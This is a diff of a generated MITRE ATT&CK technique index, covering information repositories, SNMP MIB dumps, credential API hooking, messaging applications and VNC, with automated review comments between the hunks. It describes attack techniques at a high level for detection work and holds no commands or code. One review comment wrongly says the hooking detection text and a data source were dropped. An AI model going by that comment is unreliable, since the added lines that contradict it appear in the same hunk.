by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41705,41 +42302,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
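Review bot: the rewritten T1213 description introduces three citations, `(Citation: Mitiga)`, `(Citation: TrendMicro Exposed Redis 2020)` and `(Citation: Cybernews Reuters Leak 2022)`; each needs a matching `source_name` under `external_references`, which the two later hunks of this object do add, so the description and reference hunks must land together or the citations dangle. Separately, the contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two entries and `Obsidian Security` is added; worth a quick check that the split matches upstream rather than being a comma-parsing artifact of the generator.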
@@ -41768,10 +42376,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -41784,10 +42391,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41796,11 +42413,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
@@ -41837,7 +42457,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
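Review bot: T1602.001 is the second object whose `modified` timestamp rewinds (`2021-04-29T14:49:39.188Z` to `2020-10-22T01:54:22.812Z`), and the following hunk removes its `x_mitre_attack_spec_version: 2.1.0` without adding a replacement, leaving the object with no attack spec version at all. With T1557.002 keeping 2.1.0 and most other objects at 3.2.0, this single generated file now carries three different states for one field, which strongly suggests objects merged from sources of different ages; regenerate from one dataset release before merging.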
@@ -41869,115 +42489,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
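Review bot: the new T1213.005 block closes with `atomic_tests: []` and no `identifier: T1213.005` line, while the regenerated T1056.004 entry in the same hunk carries `identifier: T1056.004` immediately before its `atomic_tests: []`; some older entries further down (T1080, T1550) also lack the field, so this may be a generator convention, but if any loader keys on `identifier` the new sub-technique will not be indexed like its siblings. Separately, the old T1056.004 body removed here (`x_mitre_permissions_required` with Administrator/SYSTEM, the `SetWindowsHookEx`/`SetWinEventHook` detection text, the `Process: OS API Execution` data source) has no `+` counterpart anywhere in this hunk; confirm that the regenerated T1056.004 carries them earlier in the entry, or that dropping them is intended, because nothing visible here shows where they went.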
@@ -41988,6 +42675,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41997,7 +42685,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -42013,66 +42700,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
